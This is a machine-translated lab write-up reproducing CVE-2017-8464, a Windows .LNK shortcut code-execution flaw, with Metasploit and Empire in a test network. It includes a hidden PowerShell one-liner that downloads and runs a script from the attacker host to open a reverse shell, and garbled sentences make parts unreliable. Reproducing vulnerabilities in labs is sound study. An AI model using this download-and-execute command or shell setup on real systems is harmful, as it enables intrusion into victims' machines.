0x01 vulnerability principle
Windows system files by parsing .LNK suffix, using the binary to be resolved, and when the malicious binary code to be executed on the remote system identification code execution can be achieved, because it is in the process explorer.exe running, so load into memory when the current user has the same rights.
So an attacker exploit this parsing process, will contain malicious binary code that came into being after a removable drive (or remote sharing process), the victim using powershell .LNK parse the file will be controlled by hackers.
An attacker who successfully exploited this vulnerability could obtain the same user rights as the local user.
0x02 affected version
windows 7(32/64位)
windows 8(32/64位)
windows 8.1(32/64位)
windows 10(32/64位,RTM/TH2/RS1/RS2)
windows server 2008(32/64位/IA64)
windows server 2008 R2(64位/IA64)
windows server 2012
windows server 2012 R2
windows server 2016
windows Vista0x03 exploit 1
Use Metasploit to the target host exploit existing vulnerabilities. Selected multi / handler monitoring module, using the available shell.
First we have to be ready CVE-2017-8464 reproduce the environment, kali virtual machine and windows server2008.
Attack: kali IP: 192.168.137.133
Drone: windows server2008 IP: 192.168.137.132
3.1 Open kali terminal generates a file powershell
3.2 then the generated file is moved to the up / down var / www / html directory
3.3 open apache service
3.4 attempts to access it on the page
3.5 access is no problem, we start MSF, using the monitor module multi / handler, and configure the corresponding option
3.6 Then start listening
3.7 Then we switch to windows server2008, create a shortcut
Here we enter the constructed path code:
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.137.133/1.ps1');test.ps1"
3.8 Click Next, then click Finish to generate is a shortcut powershell
We run about 3.9 Double-click the shortcut, because this shortcut seconds back, not shot, so here
Not a map, it will double-click. Then we cut back kali virtual machine, it has rebounded to a shell found
0x04 exploit 2
4.1 Empire attack tool Win10 systems, as shown below:
4.2 here you will find tools and Empire msf has a similar look.
We then use a script can be recognized by Windows, which generates .bat file, and then immediately stored in the / tmp:
4.3 When you use Notepad to open the bat script, you can see the malicious binary code using base64 encryption:
4.4 When this file is named launcher.bat up and running in Windows, back to the listening port, you can see the target host is already on the line:
4.5 so, Windows will get the current user privileges:
0x05 Reference Links
1. CVE-2017-8464 vulnerability reproducibility
2. "Stuxnet three generations" CVE-2017-8464 vulnerability reproduced on Powershell